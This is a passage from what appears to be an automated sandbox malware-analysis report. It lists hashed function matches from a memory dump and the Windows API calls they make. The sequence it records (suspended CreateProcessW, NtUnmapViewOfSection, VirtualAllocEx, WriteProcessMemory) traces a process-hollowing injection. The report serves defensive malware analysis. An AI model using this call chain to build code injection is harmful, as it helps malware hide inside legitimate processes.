                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: b7de26201dfb25a511b6ba7062084ab4186202995379a929b75e60b010e66dc8
                    • Instruction ID: 6518281b1a64101043514440c7a2f6d3fd8250afd6d9d78967c24486d4dff312
                    • Opcode Fuzzy Hash: b7de26201dfb25a511b6ba7062084ab4186202995379a929b75e60b010e66dc8
                    • Instruction Fuzzy Hash: CEC1BE3DB59613EEEF17A7618C12F3D799AFB81B05F249519F0839A142EE34CE026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: de8202db822ea1921288a02b86e575b5a62394531f140fd65f8fef09a0339bd6
                    • Instruction ID: 053adda743b056a786f2d601ed7088f9fddd2bb39b60773364661e88488de1be
                    • Opcode Fuzzy Hash: de8202db822ea1921288a02b86e575b5a62394531f140fd65f8fef09a0339bd6
                    • Instruction Fuzzy Hash: 62C1C03DB59617EEEF17A7618C12F3D79A9FB41B05F249518F0839A142EE34CE02A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 2f902628984d4289033428fb04088459c95369ca4467549356379d6328fdebd6
                    • Instruction ID: c2fd47a2466cbc69ed16b6a1cb83935fe39c690d03c0a5b2edba7ff8bc231018
                    • Opcode Fuzzy Hash: 2f902628984d4289033428fb04088459c95369ca4467549356379d6328fdebd6
                    • Instruction Fuzzy Hash: 7AB1C03DB59617EEEF17A7618C12F3D79A9FB41B05F249518F0839A042EE34CE02A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 5eec219bc5f763040baa4ce212192e92bfdb3eb2bc2b66e16641bb9413b8d155
                    • Instruction ID: 9466e0a4b183b514cf5bc128f0f4d24511d59e7e2df6f35483b56e92cf2c9e06
                    • Opcode Fuzzy Hash: 5eec219bc5f763040baa4ce212192e92bfdb3eb2bc2b66e16641bb9413b8d155
                    • Instruction Fuzzy Hash: B6C1CF3DA59617EEEF17A7618C12F3D79A9FB41B05F244519F0839A182EE34CE02A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 59047b311847c9dfcd54b4609c3ec7ebfc526144f90ef211ff4e0e9fff93ca8b
                    • Instruction ID: 3f6f28af0cac30f1d22ed61b65d7d938168239573eb5a3cfea28ad640e06d5f0
                    • Opcode Fuzzy Hash: 59047b311847c9dfcd54b4609c3ec7ebfc526144f90ef211ff4e0e9fff93ca8b
                    • Instruction Fuzzy Hash: C0B1CE3DA19617EEEF17A7618C12F3D79AAFB41B05F244519F0839A042EE34CE02A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: c8ee5f17dcb5f28ae2733c94792cadeed04190c56f688cabaa2e6329671c8746
                    • Instruction ID: 3ef9ec6cfff050ddf944b4105ec513e1ec0ebec3f643238cdd33fdd6b5c96065
                    • Opcode Fuzzy Hash: c8ee5f17dcb5f28ae2733c94792cadeed04190c56f688cabaa2e6329671c8746
                    • Instruction Fuzzy Hash: 00B1AE3DB59617EEEF17A7618C12F3D7DAAFB41B05F249518F1839A042EE34C902A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: f87226f02c6b9537023dbcfd3e48d645b2788d22ba3f4075fe87e6e0772af295
                    • Instruction ID: d5b1dddac74d11268b4d816f8c338379aebed133d9c5fd35b704056f7ef14f78
                    • Opcode Fuzzy Hash: f87226f02c6b9537023dbcfd3e48d645b2788d22ba3f4075fe87e6e0772af295
                    • Instruction Fuzzy Hash: 36B1903DB59617EEEF17A7618C12F3D7DAAFB41B09F245518F0839A142EE34C902A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 53ea77fb2fd8ceae4feccdad31961cf4784dca35f23adbf7ec4a2bc6ea0005e0
                    • Instruction ID: b0d9999d142196a076a439822661b294e66314edfb0f3c7ea4e0060226721f99
                    • Opcode Fuzzy Hash: 53ea77fb2fd8ceae4feccdad31961cf4784dca35f23adbf7ec4a2bc6ea0005e0
                    • Instruction Fuzzy Hash: FDB19F3DB59617EEEF17A7618C12F3D7DAAFB81B09F245518F0839A142EE34C902A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 963392458-2896586159
                    • Opcode ID: 23fb8784c81a0c4d8619528a71653a8ad43e51c2ef58418232b7044396607454
                    • Instruction ID: 8b3b3d0264d12e72d1a2675ec38aa3dec3d0fe7a7bb9c82a597d2c756f8270fc
                    • Opcode Fuzzy Hash: 23fb8784c81a0c4d8619528a71653a8ad43e51c2ef58418232b7044396607454
                    • Instruction Fuzzy Hash: C3B1A03DB59617EEFF17A7618C12F3D79AAFB41B09F245518F0839A142EE34C902A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 963392458-2896586159
                    • Opcode ID: 8565c878a3deed42d47c02356dec811ee2fc4eb26b09eb4fadbda93de0f2137b
                    • Instruction ID: 025762c48f9f9ad57f4d09ba8bc899296eac79565a49914676b06f9a6f3b5a6c
                    • Opcode Fuzzy Hash: 8565c878a3deed42d47c02356dec811ee2fc4eb26b09eb4fadbda93de0f2137b
                    • Instruction Fuzzy Hash: 73A1B13DB59617EEEF17A7618C12F3D79A9FF41B09F245518F0839A182EE34C902A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 963392458-2896586159
                    • Opcode ID: 7b87c3db8dc362504aba36e795895d3c41696d111f8d173b4f00d75f98f0832a
                    • Instruction ID: c6a00a3e5768f1f417b23da2fb33b82f040481681603503433c5781ee3d82d2f
                    • Opcode Fuzzy Hash: 7b87c3db8dc362504aba36e795895d3c41696d111f8d173b4f00d75f98f0832a
                    • Instruction Fuzzy Hash: B2A1A03DB58617EEEF17A7618C12F3D79A9FF41B09F245518F0839A182EE34C901A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 963392458-2896586159
                    • Opcode ID: ca629caef0a835ae26e1444fee6d0834b4fb3b0edd8e052a36b4de6badd2e181
                    • Instruction ID: 589bff9ac5d402170ecc9f6e1a4a639d8a4d810d911f65155744c3882f98b226
                    • Opcode Fuzzy Hash: ca629caef0a835ae26e1444fee6d0834b4fb3b0edd8e052a36b4de6badd2e181
                    • Instruction Fuzzy Hash: 0EA19D3DA58617EEEF17A7618C12F3D7AA9FB41B09F245558F0839A142EE34C902A630
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: VirtualAllocEx$e
                    • API String ID: 963392458-3414709220
                    • Opcode ID: f1d57a2e5f4bb6830363ef58f08661e8d702e7259bd3d167468fe82860ee8c7e
                    • Instruction ID: e987d05ff2a697a925a1129e1225e70bac1cb04c83fb0ba92a089f485b4a14a8
                    • Opcode Fuzzy Hash: f1d57a2e5f4bb6830363ef58f08661e8d702e7259bd3d167468fe82860ee8c7e
                    • Instruction Fuzzy Hash: 48A19E3DA58613EEEF17A7618C12F3D7DA9FB41B09F245518F0839A152FE34C901A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: VirtualAllocEx$e
                    • API String ID: 963392458-3414709220
                    • Opcode ID: 58d1255eae8a6caefc0357cf6fb63d633457d868c0c8260190ca25ce653851f6
                    • Instruction ID: d7bdb1df41061e7e445965aadfd7a34be875c833c96706e1446d8fa7eecf321d
                    • Opcode Fuzzy Hash: 58d1255eae8a6caefc0357cf6fb63d633457d868c0c8260190ca25ce653851f6
                    • Instruction Fuzzy Hash: FB919E3DA58613EEEF17A7618C12F3D79A9FF41B09F249518F0839A152EE34C901A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00D91B9A
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcessSectionUnmapView
                    • String ID: VirtualAllocEx$e
                    • API String ID: 1619107759-3414709220
                    • Opcode ID: 52778197a532161633e098df0325a76d3a3389b1dd9d2aa0d1ef766b4031aefb
                    • Instruction ID: d4b7d6c24ce6df997d4d70316651370d1852917f51016e3793277835be7f8527
                    • Opcode Fuzzy Hash: 52778197a532161633e098df0325a76d3a3389b1dd9d2aa0d1ef766b4031aefb
                    • Instruction Fuzzy Hash: DA81A13DA58513EEEF17A7618C02E3D7EA9FF81705F249558F08396152EE34C902A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00D91B9A
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocCreateProcessSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx$e
                    • API String ID: 2181670624-3414709220
                    • Opcode ID: 6fc698ad73ede1d33af53bfef04ffcc6a4ef853f0292bd4d88eaf2d3f9a98a61
                    • Instruction ID: ba6fa6696598f183de94ae423a4a00570a12170b41970662ebb3b0f2bf43787e
                    • Opcode Fuzzy Hash: 6fc698ad73ede1d33af53bfef04ffcc6a4ef853f0292bd4d88eaf2d3f9a98a61
                    • Instruction Fuzzy Hash: 0C81AF3DA58517EEFF1BA7618C12E3DBDA9FF81B05F249518F0839A152EE34C901A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00D91B9A
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocCreateProcessSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx$e
                    • API String ID: 2181670624-3414709220
                    • Opcode ID: 6faa3546c9fd00073e5a457d6f28b102ba98c7acca79cc76271f017ee15965bf
                    • Instruction ID: 4866ac4499f73eea1925b7b9d17b0c8fb8951f3bf9113db02412aaea8ab849af
                    • Opcode Fuzzy Hash: 6faa3546c9fd00073e5a457d6f28b102ba98c7acca79cc76271f017ee15965bf
                    • Instruction Fuzzy Hash: 9371A23DA54517EEEF1BA7618C02A3DBEA9FF81B05F249519F04396153EE34C901A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00D91B9A
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocCreateProcessSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx$e
                    • API String ID: 2181670624-3414709220
                    • Opcode ID: 3ad994d27de5206e7c8a6355cba1e8e1cb9d50b88e8de6fe583e2850bcc5eb5d
                    • Instruction ID: f2c9b0bbee95a4d5003e1ccf93add6ef77d3f70b4f502ca312021f8c8be90741
                    • Opcode Fuzzy Hash: 3ad994d27de5206e7c8a6355cba1e8e1cb9d50b88e8de6fe583e2850bcc5eb5d
                    • Instruction Fuzzy Hash: 9B71B23DA54617EEEF1BA7618C12E3DBEA9FF81705F249419F04396153EE34C901A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: af9ac0b87de969eadb4c408595c800d3ac696967ce67c7bf93f4a9e7a4054187
                    • Instruction ID: 6f4eb785bc8a640d2c04e728726d1e864ab47e80abdb65ec4d95bfb7f4df2ef4
                    • Opcode Fuzzy Hash: af9ac0b87de969eadb4c408595c800d3ac696967ce67c7bf93f4a9e7a4054187
                    • Instruction Fuzzy Hash: 33517A3DA68613EEFF1B67619C12E3D79A9FF81B05F249518F08396183EE35CA026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: 568a242ed199f376b7d6f9cbc8b1507a3290ca4932e641ff519afa140fa44415
                    • Instruction ID: c1b519e87c106c0ee78433fd517b0c3fe82ba76f673ab02863b710301e509030
                    • Opcode Fuzzy Hash: 568a242ed199f376b7d6f9cbc8b1507a3290ca4932e641ff519afa140fa44415
                    • Instruction Fuzzy Hash: DF517B3DA58513AEFF1B67619C12E3D7D99FF81B05F289518F08396183EE35CA026631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                      • Part of subcall function 00D91CB0: VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: 7898c4c87012bef95323b5df6b49c50ae41beeaaa732c7ee309b8c548582080b
                    • Instruction ID: c980e05d5a68f9f36fa4f2d5bc4cd742d3c56c9cd58ec57f1d2d4059e3cd9005
                    • Opcode Fuzzy Hash: 7898c4c87012bef95323b5df6b49c50ae41beeaaa732c7ee309b8c548582080b
                    • Instruction Fuzzy Hash: 2351583DA58513AEFF1B67619C12E3D79A9FF81B05F249519F0839A183EE34CA026631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                      • Part of subcall function 00D91CB0: VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: b369795b6b3b4aad0a1a6a5f6562f5c1c15e44ebac51d73e2272b5ab69c00b1d
                    • Instruction ID: e738e169da0dab9db3107a140b8d3590b2555a907693e50e0583a28c18c5e89e
                    • Opcode Fuzzy Hash: b369795b6b3b4aad0a1a6a5f6562f5c1c15e44ebac51d73e2272b5ab69c00b1d
                    • Instruction Fuzzy Hash: AE51793DA58613AEFF1B67609C12E3D79A9FF81B05F249519F08396093EE34CA026631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                      • Part of subcall function 00D91CB0: VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: a629abad902a7b65e16c71844c4cce067917ef760d73d4f94390d060d10b591f
                    • Instruction ID: 2f23a7320d7969c4939f3b1f68e970b05ef22f73e8bf4f2731c914750e128ca1
                    • Opcode Fuzzy Hash: a629abad902a7b65e16c71844c4cce067917ef760d73d4f94390d060d10b591f
                    • Instruction Fuzzy Hash: 03519B3DA18613EEFF1B67619C12E3D79A9FF81B05F249519F08396083EE34CA01A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: a3f1874cad9720e790f306d334e0fea3cbc48968f35a2c28eb104fcec57d9bb2
                    • Instruction ID: 01a875e52f29535bbb2ba5334ede5508dd4eaf32e0342ce5c74e6e1dbec4afa9
                    • Opcode Fuzzy Hash: a3f1874cad9720e790f306d334e0fea3cbc48968f35a2c28eb104fcec57d9bb2
                    • Instruction Fuzzy Hash: ED418B3D668513EEFF1B63609C12E3D79A9FF81B05F289528F0839A043DE34C9026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: 3342f43370aa44f67f4078b01202c6b2d78177dbd371649fe64e271375d627ac
                    • Instruction ID: 8c67ae45290de96fb8a4f7acc6de79ebbd48ef8c9d642ed425ce494fc5f19155
                    • Opcode Fuzzy Hash: 3342f43370aa44f67f4078b01202c6b2d78177dbd371649fe64e271375d627ac
                    • Instruction Fuzzy Hash: C6417B3DA28513EEFF1B67619C12E3D6999FF81B05F689518F083D6143EE35C9026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: 8e9852d15e4511fca0b19a9af5f756f5d2b73f2fba728dfd1361f970931d5a43
                    • Instruction ID: 87cf73e1dae15fc4029ce133e41ed98b1a019703cb067a4f61e891d4f128ca62
                    • Opcode Fuzzy Hash: 8e9852d15e4511fca0b19a9af5f756f5d2b73f2fba728dfd1361f970931d5a43
                    • Instruction Fuzzy Hash: E3417A3DA29513EEFF1B67619C02E3E6D99FF91B05F28955CB08395043EE35CA026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: b7d3ed824fc410e548ae39d9472c26443d1d8b5b60dd02e76ff90d4b25fedc1b
                    • Instruction ID: a36a3c48c5bb0250fa10345b226b620563fa9c9e9b21533dd965cc89692eb632
                    • Opcode Fuzzy Hash: b7d3ed824fc410e548ae39d9472c26443d1d8b5b60dd02e76ff90d4b25fedc1b
                    • Instruction Fuzzy Hash: B0415B3DA18513EEFF1B67A19C12E3E69A9FF91B05F249518F08396043EE34CA016531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID: U$f
                    • API String ID: 2738559852-3222212738
                    • Opcode ID: 363cdfcf4f9ed0e7e83d16517b91efe320dc7ba137195d6f91fac9ff9ab5755e
                    • Instruction ID: e0811341768d2c7fee4e3ba58fd896aa135209e9d8c8a932599cf8e878bf56dc
                    • Opcode Fuzzy Hash: 363cdfcf4f9ed0e7e83d16517b91efe320dc7ba137195d6f91fac9ff9ab5755e
                    • Instruction Fuzzy Hash: DC515739E14616DFEF16DB64CC81BBDBAB1FB84304F658168D087EB241DA34DE019E60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID: U$f
                    • API String ID: 2591292051-3222212738
                    • Opcode ID: cbd23944fa6dac052ea3826d733f5c9681578b518551f3281ed63a448b419184
                    • Instruction ID: cc4cce95fa4e7942451d39453af08d85e94e076f1ad39fea8a5078c024a4dd9f
                    • Opcode Fuzzy Hash: cbd23944fa6dac052ea3826d733f5c9681578b518551f3281ed63a448b419184
                    • Instruction Fuzzy Hash: 26514839E546169FEF16DE54CC81BBDB6B1FB98304F668168D087EB240DA34EE019E60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID: U$f
                    • API String ID: 2591292051-3222212738
                    • Opcode ID: 1672dd24bb482af518c7ed726df05ca0bd58107dd05941ded8a85d3e04d6d6ed
                    • Instruction ID: ea0664e7c77b30418a85e05a5aeb7107db6f97212f7f0dfcb2ded1a1c2146291
                    • Opcode Fuzzy Hash: 1672dd24bb482af518c7ed726df05ca0bd58107dd05941ded8a85d3e04d6d6ed
                    • Instruction Fuzzy Hash: D2512839E146169FEF16DA54CC81BBDBBB1FB94304F6651A8D087EB240DA34EE019E60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                      • Part of subcall function 00D915C4: VirtualAlloc.KERNELBASE ref: 00D91643
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: 532070062cf11b9904d3a9db09fd8773f3dc478adfd5a9ce6003f0dfcfe5d1dd
